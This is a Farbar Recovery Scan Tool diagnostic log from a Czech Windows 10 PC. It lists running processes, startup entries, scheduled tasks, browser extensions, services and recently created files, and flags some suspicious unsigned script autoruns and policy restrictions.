2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\IME
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2021-01-13 21:55 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-01-13 21:43 - 2020-08-19 19:08 - 002877952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2021-01-13 21:32 - 2017-01-29 22:43 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-01-13 21:28 - 2017-01-29 22:43 - 135062968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-01-13 13:42 - 2019-04-16 19:31 - 000018134 _____ C:\Users\IRENA-PC\Documents\web hlavní stránka.txt
2021-01-11 20:14 - 2018-10-14 17:50 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\avidemux
2021-01-10 14:44 - 2019-03-19 10:59 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Ulozto
2021-01-09 18:46 - 2017-02-16 12:26 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome
2021-01-09 18:43 - 2017-12-16 15:22 - 000000000 ____D C:\Program Files (x86)\IQ Option
2021-01-09 15:16 - 2020-05-06 13:44 - 000002563 _____ C:\Users\IRENA-PC\Desktop\YouTube Music.lnk
2021-01-09 15:16 - 2020-03-26 15:41 - 000002689 _____ C:\Users\IRENA-PC\Desktop\SS TV Remote.lnk
2021-01-09 08:06 - 2017-01-30 08:44 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2021-01-08 13:28 - 2020-06-04 19:19 - 000002419 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-07 13:56 - 2017-01-30 08:44 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-01-05 10:28 - 2020-07-25 06:20 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Telegram Desktop
2021-01-05 10:17 - 2019-10-29 08:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Telegram Desktop
2021-01-03 17:07 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Authy Desktop
2021-01-03 10:57 - 2019-01-02 09:37 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\HandBrake
2021-01-03 08:36 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\SquirrelTemp
2020-12-28 18:45 - 2019-07-07 19:03 - 000001086 _____ C:\Users\IRENA-PC\Documents\telenovely.txt
2020-12-23 20:11 - 2017-04-27 15:39 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Ulozto File Manager
2020-12-22 18:29 - 2020-08-19 19:19 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-12-22 18:28 - 2020-12-15 18:05 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000001382 _____ C:\Users\Public\Desktop\Free Netflix Download.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FreeGrabApp
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\Program Files (x86)\FreeGrabApp
==================== Files in the root of some directories ========
2019-01-25 08:47 - 2019-02-04 08:42 - 000012386 _____ () C:\Users\IRENA-PC\AppData\Roaming\downloads.json
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
==================== End of FRST.txt ========================
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-01-2021
Ran by IRENA-PC (administrator) on IRENA-PC (20-01-2021 19:42:40)
Running from C:\Users\IRENA-PC\Desktop
Loaded Profiles: IRENA-PC
Platform: Windows 10 Pro Version 2004 19041.746 (X64) Language: Čeština (Česko)
Default browser: Chrome
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Firebit OU -> Rainmeter) C:\Program Files\Rainmeter\Rainmeter.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
(Open Source Developer, Robin Krom -> Greenshot) C:\Program Files\Greenshot\Greenshot.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(VIA Technologies Inc. -> VIA Technologies, Inc.) C:\Windows\System32\ViakaraokeSrv.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [Greenshot] => C:\Program Files\Greenshot\Greenshot.exe [527792 2017-01-28] (Open Source Developer, Robin Krom -> Greenshot)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe [5491248 2020-12-07] (Adobe Inc. -> Adobe Systems Incorporated)
HKLM\...\Print\Monitors\us008 Langmon: C:\WINDOWS\system32\us008lm.dll [31256 2016-02-15] (Microsoft Windows Hardware Compatibility Publisher -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Poslat do aplikace OneNote.lnk [2017-11-14]
ShortcutTarget: Poslat do aplikace OneNote.lnk -> C:\Program Files\Microsoft Office\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rainmeter.lnk [2019-10-05]
ShortcutTarget: Rainmeter.lnk -> C:\Program Files\Rainmeter\Rainmeter.exe (Firebit OU -> Rainmeter)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0F781840-4995-487B-B8DB-7FF1EBC5C707} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-07] (Mozilla Corporation -> Mozilla Foundation)
Task: {10E62E26-1578-4A0E-8611-FFDA4C61A221} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {21567792-F593-4A2B-A8B0-FD12215C4505} - System32\Tasks\PrivaZer_SkipUAC => C:\Program Files (x86)\PrivaZer\PrivaZer.exe [19999848 2021-01-09] (Goversoft LLC -> Goversoft LLC)
Task: {2765CE0A-1B19-47DC-BC12-CDD903EF335B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {64EFD4BD-F0D7-4F88-AE46-F5DA6CEA8254} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {87D9290F-3525-4C2A-BBCB-0D49A626C8EE} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {8E9C0AAA-5D6D-45B9-8856-FD83EA5BEDC6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9567EB88-214D-4752-88E7-2B395BCEA8D3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EB806155-3D2A-4177-A203-0FD110F04427} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
Task: {F4FC8779-698F-4176-95A0-5286A8AEA159} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{3ca49153-5896-4467-b2d9-205cc451433b}: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{6275ca9c-c816-47f0-8729-a3236c979e44}: [DhcpNameServer] 192.168.0.1 1.1.1.1
Edge:
=======
DownloadDir: C:\Users\IRENA-PC\Downloads
Edge DefaultProfile: Default
Edge Profile: C:\Users\IRENA-PC\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-20]
FireFox:
========
FF DefaultProfile: woy2c7nl.default-1506939824614
FF ProfilePath: C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 [2021-01-20]
FF Homepage: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://www.seznam.cz/
FF Notifications: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://sktorrent.os.tc; hxxps://kryptomagazin.cz
FF NewTabOverride: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> Disabled: {672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}
FF Extension: (HLS Video Download) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\@hls.video.download.xpi [2021-01-05]
FF Extension: (Download with Ant Download Manager) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\antffw@antdownloadmanager.com.xpi [2021-01-05]
FF Extension: (Avast Online Security) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\wrc@avast.com.xpi [2020-06-19]
FF Extension: (Video Downloader for FireFox) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}.xpi [2021-01-05]
FF Extension: (KITVideofy) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{6c09ef97-fbbc-4dc1-bc9a-777b216f1303}.xpi [2021-01-05]
FF Extension: (Plná Peněženka Lištička Lite) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{85d8e8cc-273a-4845-a75b-4b44377c703c}.xpi [2021-01-13]
FF Extension: (Video DownloadHelper) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2020-12-16]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @java.com/DTPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\dtplugin\npDeployJava1.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\plugin2\npjp2.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default [2021-01-20]
CHR DownloadDir: D:\Filmy\Seriály\Telenovely
CHR Notifications: Default -> hxxps://app.expertoption.com; hxxps://app.plus500.com; hxxps://calendar.google.com; hxxps://findmedia.biz; hxxps://ganesha.goodly.pro; hxxps://gofesm.com; hxxps://kryptomagazin.sk; hxxps://my.jdownloader.org; hxxps://prokliky.cz; hxxps://solvena.ru; hxxps://thestreetlottery.com; hxxps://trading11.com; hxxps://watch-video.net; hxxps://www.facebook.com; hxxps://www.nej-ceny.cz; hxxps://www.netflix.com; hxxps://www.publish0x.com; hxxps://www.youtube.com; hxxps://zignaly.com
CHR HomePage: Default -> hxxps://www.seznam.cz/
CHR StartupUrls: Default -> "hxxp://seznam.cz/","hxxp://www.google.cz/","hxxps://www.google.com ... oogle.com/"
CHR Extension: (Easy Auto Refresh) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aabcgdmkeabbnleenpncegpcngjpnjkc [2019-07-01]
CHR Extension: (Seznam doplněk - Esko-) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blmojkbhnkkphngknkmgccmlenfaelkd [2019-10-08]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-30]
CHR Extension: (Aliexpress SuperStar česky, Historie cen a koruny) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ciclollkolafellcaolgccmfjldgpolo [2020-04-19]
CHR Extension: (YouTube Music) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cinhimbnkkaeohfgghhklpknlkffjgod [2021-01-14]
CHR Extension: (Image Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnpniohnfphhjihaiiggeabnkjhpaldj [2019-01-27]
CHR Extension: (ZenMate - IP & Browser Check) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\dchhalahcjpkabdgonjhoogdcipienhf [2017-01-30]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\egjdagpondeapnnockkjcocjdkfkffnb [2021-01-14]
CHR Extension: (Přehrávání | SledovaniTV.cz) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gccmmlklnkpaihbmbpcdknammjmmdocb [2021-01-14]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2021-01-15]
CHR Extension: (Stream Video Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-16]
CHR Extension: (Hangouts Google) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nckgahadagoaajjgafhacjanaoiihapd [2020-08-13]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (SS TV Remote) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\npciacphlpgklgcjgiamnmfjipjdkacf [2020-03-23]
CHR Extension: (Gmail) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-25]
CHR Extension: (Chrome Media Router) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-12-09]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-01-20]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\System Profile [2021-01-20]
CHR HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]
Brave:
=======
BRA Profile: C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2021-01-20]
BRA Extension: (McAfee® WebAdvisor) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm\2.0.673 [2019-02-09]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2019-02-09]
BRA Extension: (Brave Ad Block Updater (Default)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cffkpbalmllkdoenhmdmpbkajipdjfam [2019-02-23]
BRA Extension: (Brave Tor Client Updater (Windows)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cpoalefficncklhjfpglfiplenlpccdb [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm [2019-02-09]
BRA Extension: (Brave Ad Block Updater (CZE, SVK: EasyList Czech and Slovak)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\omkkefoeihpbpebhhbhmjekpnegokpbj [2019-02-23]
BRA Extension: (Brave HTTPS Everywhere Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oofiananboodjbbmdelgdommihjbkfag [2019-02-09]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5198064 2021-01-13] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13172752 2020-01-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R2 VIAKaraokeService; C:\WINDOWS\system32\viakaraokesrv.exe [36504 2015-06-22] (VIA Technologies Inc. -> VIA Technologies, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
S3 e2eVAWdm; C:\WINDOWS\System32\drivers\VAud_WDM.sys [112696 2017-07-12] (ARTRAY CO., LTD. -> e2eSoft)
R2 npf; C:\WINDOWS\system32\drivers\npf.sys [36600 2018-12-07] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
R3 nuviocir; C:\WINDOWS\system32\DRIVERS\nuviocir_x64.sys [40464 2015-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Nuvoton Technology Corp.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) (Whitelisted) =========
(If an entry is included in the fixlist, the file/folder will be moved.)
2021-01-20 18:40 - 2021-01-20 19:43 - 000020181 _____ C:\Users\IRENA-PC\Desktop\FRST.txt
2021-01-20 16:58 - 2021-01-20 16:59 - 000000000 ____D C:\AdwCleaner
2021-01-20 16:57 - 2021-01-20 16:55 - 008458096 _____ (Malwarebytes) C:\Users\IRENA-PC\Desktop\adwcleaner_8.0.9.exe
2021-01-20 09:32 - 2017-07-12 23:48 - 000112696 _____ (e2eSoft) C:\WINDOWS\system32\Drivers\VAud_WDM.sys
2021-01-20 09:02 - 2021-01-20 09:03 - 000433944 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-01-20 08:46 - 2021-01-20 08:46 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\GlarySoft
2021-01-20 08:45 - 2021-01-20 09:01 - 000000000 ____D C:\ProgramData\GlarySoft
2021-01-20 08:45 - 2021-01-20 09:01 - 000000000 ____D C:\Program Files (x86)\Glarysoft
2021-01-20 08:16 - 2021-01-20 10:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GridinSoft Anti-Malware
2021-01-20 08:16 - 2021-01-20 08:16 - 000000000 ____D C:\ProgramData\GridinSoft
2021-01-20 07:13 - 2021-01-20 18:05 - 000000000 ____D C:\Users\IRENA-PC\Desktop\FRST-OlderVersion
2021-01-14 04:09 - 2021-01-14 04:09 - 000000000 ___RD C:\Users\IRENA-PC\ODBA
2021-01-13 21:51 - 2021-01-13 21:51 - 000581120 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000467968 _____ C:\WINDOWS\system32\AssignedAccessCsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000234496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000157184 _____ C:\WINDOWS\system32\uwfcsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000138056 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VBICodec.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000101704 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000095744 _____ C:\WINDOWS\system32\VirtualMonitorManager.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000729600 _____ (Microsoft Corporation) C:\WINDOWS\system32\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000455680 _____ C:\WINDOWS\SysWOW64\WindowManagementAPI.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000446976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
